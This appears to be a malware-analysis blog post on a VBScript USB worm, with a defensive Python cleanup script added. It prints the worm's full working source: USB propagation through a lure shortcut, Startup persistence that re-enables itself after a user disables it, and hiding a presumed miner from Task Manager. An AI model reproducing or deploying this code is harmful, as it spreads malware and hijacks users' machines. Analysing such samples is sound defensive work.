Source-code analysis of the USB virus movemenoreg

Author: Alex Yang   Published: 2026-07-02   Views: 12   Comments: 0

As a portable removable storage device, the USB flash drive is used in a wide range of settings, is plugged and unplugged frequently, and carries data between machines, which makes it one of the main vehicles for spreading malware. Lightweight script viruses ride on these properties to infect silently, persist, and spread in bulk, posing a serious threat to personal endpoints and their data. The malicious program analyzed in this article is a USB-propagating virus written in VBScript. Its code is compact, under three hundred lines in total, yet it implements a complete set of malicious functions: endpoint infection, autostart at boot, USB monitoring, cross-device propagation and evasion of detection, with a complete structure and clear logic. From an in-depth analysis of its file structure, infection mechanism, propagation flow and core code characteristics, together with a key command left behind in the script, it can be tentatively concluded that the virus is accompanied by a cryptomining program. To clarify its attack principle, propagation path and potential harm, this article dissects its file composition, bidirectional infection flow and core malicious characteristics, as a reference for identifying, removing and defending against this class of USB script virus.

1. Symptoms

After this virus infects a USB drive, it creates two hidden system folders in the drive's root directory together with a shortcut that carries the same name as the drive's volume label. The two folders with hidden and system attributes are named _ and WindowsServices. The _ folder holds all of the user's original files, which are moved there from the drive; the WindowsServices folder contains three virus scripts: movemenoreg.vbs, installer.vbs and helper.vbs. Reading the virus source shows that this directory should also contain a fourth program, WindowsServices.exe, which is absent from the sampled drive. The name of the generated shortcut is identical to the drive's original drive letter / volume label.

Virus file list:

Opening the shortcut shows all of the original files on the USB drive

The WindowsServices directory contains the virus VBS scripts

2. Source code walkthrough

2.1 The shortcut file

The shortcut file is the entry point; it lures the user into clicking it and thereby launches the virus's main file. The shortcut target is:

%COMSPEC% /C .\WindowsServices\movemenoreg.vbs

%COMSPEC% is an environment variable that resolves to C:\Windows\system32\cmd.exe, so the shortcut uses cmd.exe to run the virus file movemenoreg.vbs.

2.2 Contents of movemenoreg.vbs

' On error, continue with the next statement (every failure below is silently ignored)
on error resume next
' Declare variables
Dim  strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
' Get a WScript.Shell object
Set ws = WScript.CreateObject("WScript.Shell")

Target = "\WindowsServices"

' Open the folder named '_' in the drive root, where all of the user's original files were moved
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
' In VB/VBScript, Chr(n) converts an ASCII code to its character; ASCII 34 is the double quote ", so Chr(34) is "
ws.Run Chr(34) & pfolder & "\_" & Chr(34)

' AppData is the user's application data folder, i.e. C:\Users\<username>\AppData\Roaming
AppData = ws.ExpandEnvironmentStrings("%AppData%")

DestFolder = AppData & Target

' Create the destination directory, %AppData%\WindowsServices
if (not objws.folderexists(DestFolder)) then
    objws.CreateFolder DestFolder
    Set objDestFolder = objws.GetFolder(DestFolder)
end if

' Copy the four virus files to the destination directory and mark them hidden + system.
' Files with these attributes stay invisible even when "Show hidden files" is ticked in Folder Options,
' as long as "Hide protected operating system files (Recommended)" is left enabled
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39

sub moveandhide (name)
    if (not objws.fileexists(DestFolder & name)) then
        ' Copy the file
        objws.CopyFile strFolder & name, DestFolder & "\"
        Set objmove = objws.GetFile(DestFolder & name)

        ' Mark as a hidden system file (39 = ReadOnly 1 + Hidden 2 + System 4 + Archive 32)
        ' Note: VBScript applies Not before And, so this evaluates (Not Attributes) And 39,
        ' which is nonzero whenever any of those bits is still clear
        If not objmove.Attributes AND 39 then
            objmove.Attributes = 0
            objmove.Attributes = objmove.Attributes + 39
        end if

    end if
end sub

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
' WinMgmts: is the WMI moniker prefix used in VBScript/WMI scripts to connect to the Windows WMI service;
' Root\CIMv2 is the default and most important WMI namespace, holding most system information: hardware, processes, files, services, registry, disks, etc.
' Put together, GetObject("WinMgmts:Root\Cimv2") creates a WMI management object for the local machine.
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
' Use the WMI object to check whether helper.vbs is already running; if so, exit this script.
For Each objProcess In colProcess
    vaprocess = objProcess.CommandLine
        if instr(vaprocess, "helper.vbs") then
            WScript.quit
        End if
Next

' Run helper.vbs
ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)

Set ws = Nothing

2.3 The helper.vbs file

on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")

' StartupApproved value in which Task Manager's Startup tab records whether helper.lnk is enabled
nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")

strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
' Get the path of the user's Startup folder
startupPath = ws.SpecialFolders("startup")

' Command line of the companion program (absent from this sample), presumed to be a miner
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)

MyScript = "helper.vbs"

While True
    ' Check the registry: if the startup entry has been touched (the value exists), rewrite it
    key = Empty
    key = ws.regread (nkey)
    If (not IsEmpty(key)) then
        ' A StartupApproved value starting with 02 means "enabled", so this re-enables the item after a user disables it in Task Manager
        ws.RegWrite nkey, 2, "REG_BINARY"
    End if

    If (not objws.fileexists(startupPath & "\helper.lnk")) then
        ' Create a startup shortcut for helper.vbs in the Startup folder
        Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
        link.Description = "helper"
        link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)
        link.WorkingDirectory = strPath
        link.Save
    End If

    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")

    ' Check whether installer.vbs is running; if not, start it
    call procheck(colProcess, "installer.vbs")

    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")
    Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")

    if colProcess.count = 0 And tskProcess.count = 0  then
        ' Run WindowsServices.exe with a hidden window (window style 0) while Task Manager is not open
        ws.Run miner, 0

    ElseIf colProcess.count > 0 And tskProcess.count > 0 then

        ' If the user has opened Task Manager, kill WindowsServices.exe
        For Each objProcess In colProcess
            ws.run "taskkill /PID " & objProcess.ProcessId , 0
        Next

    end if
    ' Poll every 3 seconds
    WScript.Sleep 3000
Wend

'---------------------------------------------------------------------------------

' Return if a wscript.exe process whose command line contains procname is found; otherwise launch procname from this script's folder
sub procheck(checkme, procname)

For Each objProcess In checkme
    vaprocess = objProcess.CommandLine

        if instr(vaprocess, procname) then
            Exit sub
        End if

Next

ws.Run Chr(34) & strPath & procname & Chr(34)

end sub

'--------------------------------------------------------------------------------

2.4 The installer.vbs file

installer.vbs performs the infection of newly inserted USB drives.

on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")

Target = "\WindowsServices"

'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)

'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
' Subscribe to Win32_LogicalDisk instance events (creation, deletion, modification), polled every second (WITHIN 1)
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")

While True

    ' Check whether helper.vbs is running; if not, run helper.vbs
    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
    call procheck(colProcess, "helper.vbs")

    ' Fetch the next event (blocks until one arrives)
    Set objEvent = colEvents.NextEvent

    ' DriveType 2 = removable disk
    If objEvent.TargetInstance.DriveType = 2  Then
        If objEvent.Path_.Class = "__InstanceCreationEvent" Then
            ' A new USB drive has been inserted
            device = objEvent.TargetInstance.DeviceID
            devicename = objEvent.TargetInstance.VolumeName
            DestFolder = device & "\WindowsServices"
            DummyFolder = device & "\" & "_"
            ' Create the destination directory (\WindowsServices) in the drive root
            if (not objws.folderexists(DestFolder)) then
                objws.CreateFolder DestFolder
                Set objDestFolder = objws.GetFolder(DestFolder)
                objDestFolder.Attributes = objDestFolder.Attributes + 39
            end if

            ' Copy the four virus files into the destination directory
            Call moveandhide ("\helper.vbs")
            Call moveandhide ("\installer.vbs")
            Call moveandhide ("\movemenoreg.vbs")
            Call moveandhide ("\WindowsServices.exe")

            ' Create a shortcut in the drive root that opens movemenoreg.vbs
            ' (the existence check below omits the backslash that the path on the next line includes)
            if (not objws.fileexists (device & devicename & ".lnk")) then
                Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
                link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
                link.TargetPath = "%COMSPEC%"
                link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
                link.windowstyle = 7
                link.Save
            End If

            ' Create the folder named '_' in the drive root and hide it (2 = Hidden, 4 = System)
            if (not objws.folderexists(DummyFolder)) then
                objws.CreateFolder DummyFolder
                Set objDestFolder = objws.GetFolder(DummyFolder)
                objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
                End If
            set check = objws.getFolder(device)
            ' Move all of the user's files into the '_' folder
            Call checker(check)

        End If
    End If

Wend

' Move every file and folder in the drive root into '_', except the shortcut, the worm's own folders and System Volume Information
sub checker (path)
    set home = path.Files
    For Each file in home
        Select Case file.Name
            Case devicename & ".lnk"
                'nothings
            Case Else
                objws.MoveFile path & file.Name, DummyFolder & "\"
        End Select

    Next

    set home = path.SubFolders
    For Each home in home
        Select Case home
            Case path & "_"
                'nothings
            Case path & "WindowsServices"
                'nothings
            Case path & "System Volume Information"
                'nothings'
            Case Else
                objws. MoveFolder home, DummyFolder & "\"
        End Select

    Next

end sub

'------------------------------------------------------------

' Copy the file into DestFolder and set ReadOnly + Hidden + System + Archive (39) on it
sub moveandhide (name)
    if (not objws.fileexists(DestFolder & name)) then
        objws.CopyFile strFolder & name, DestFolder & "\"
        Set objmove = objws.GetFile(DestFolder & name)

        If not objmove.Attributes AND 39 then
            objmove.Attributes = 0
            objmove.Attributes = objmove.Attributes + 39
        end if

    end if
end sub

'------------------------------------------------------------

' Return if a wscript.exe process whose command line contains procname is found; otherwise launch procname from this script's folder
sub procheck(checkme, procname)

For Each objProcess In checkme
    vaprocess = objProcess.CommandLine

        if instr(vaprocess, procname) then
            Exit sub
        End if

Next
ws.Run Chr(34) & strFolder  & "\" & procname & Chr(34)
end sub

3. Workflow

3.1 Infection flow from USB drive to computer

When an infected USB drive is plugged into a computer and the user double-clicks the shortcut in the drive root that carries the drive's name, the malware fires: the virus body copies itself to the system's %AppData%\WindowsServices folder and writes an autostart entry for persistence. From then on it continuously monitors removable storage, and as soon as a new USB drive is inserted it copies the full set of virus files onto it, completing the spread.

3.2 Reverse infection of USB drives by the host

  1. When an infected computer boots, the malware loads with the system and stays resident in the background.

  2. When a removable USB drive is detected, the virus creates two hidden folders, _ and WindowsServices, in the drive root;
    it moves all of the user's original files on the drive into the _ folder,
    and writes the full set of four malicious programs into the WindowsServices folder. It also creates a shortcut in the drive root.

  3. Double-clicking that shortcut launches the malicious script movemenoreg.vbs directly, completing the full infection of the USB drive.
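As an added example that is not part of the original article, the following Python helper triages a USB drive for the artifacts described above (the _ and WindowsServices folders, the three scripts, the missing WindowsServices.exe, and the volume-label .lnk whose target names movemenoreg.vbs) and then moves the user's files back out of _. The drive root and volume label are assumptions supplied by the caller, and nothing from the drive is ever executed.

```python
# Added example, not part of the original article: triage and clean a USB drive
# hit by the movemenoreg.vbs worm. root is the mounted drive root (e.g. Path("E:/"))
# and volume_label is the drive's label, which the worm uses as the .lnk name.
import shutil
from pathlib import Path

WORM_SCRIPTS = ("movemenoreg.vbs", "installer.vbs", "helper.vbs")
WORM_DIR = "WindowsServices"
DUMMY_DIR = "_"


def lnk_points_to_worm(lnk: Path) -> bool:
    """Look for the worm's target inside the shortcut bytes without resolving it.
    .lnk string data may be stored as ANSI or UTF-16LE, so check both encodings."""
    data = lnk.read_bytes()
    marker = "movemenoreg.vbs"
    return marker.encode("ascii") in data or marker.encode("utf-16-le") in data


def triage(root: Path, volume_label: str) -> dict:
    """Report which of the worm's artifacts are present in the drive root."""
    ws = root / WORM_DIR
    lnk = root / f"{volume_label}.lnk"
    return {
        "dummy_folder": (root / DUMMY_DIR).is_dir(),
        "scripts": [s for s in WORM_SCRIPTS if (ws / s).is_file()],
        "payload_exe": (ws / "WindowsServices.exe").is_file(),
        "lnk": lnk.is_file() and lnk_points_to_worm(lnk),
    }


def restore(root: Path, volume_label: str, quarantine: Path) -> int:
    """Move the worm's folder and shortcut into quarantine (kept for analysis,
    never run), then move the user's files from '_' back to the root.
    Returns the number of top-level entries restored."""
    quarantine.mkdir(parents=True, exist_ok=True)
    for name in (WORM_DIR, f"{volume_label}.lnk"):
        item = root / name
        if item.exists():
            shutil.move(str(item), str(quarantine / name))
    dummy = root / DUMMY_DIR
    restored = 0
    if dummy.is_dir():
        for entry in list(dummy.iterdir()):
            shutil.move(str(entry), str(root / entry.name))
            restored += 1
        dummy.rmdir()
    return restored
```

The hidden/system attributes the worm sets do not block shutil.move, so the restored files reappear in the root with their original names; the quarantined copies keep the scripts available for comparison against other samples.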

4. Summary

  • This VBS malicious script is under three hundred lines yet fully implements the core malicious functions of host infection, USB propagation and evasion of removal;

  • Its variable naming and functional decomposition are disciplined; the author has mature experience in VBScript and malware development.

  • The sample lacks the WindowsServices.exe file, so the attacker's full intent cannot be determined, but from the following line in helper.vbs that invokes the program it can be inferred that the companion program is probably a miner.

miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)

Solemn statement: this article analyzes the virus source code purely for learning and knowledge sharing; the author bears no responsibility for any consequences!
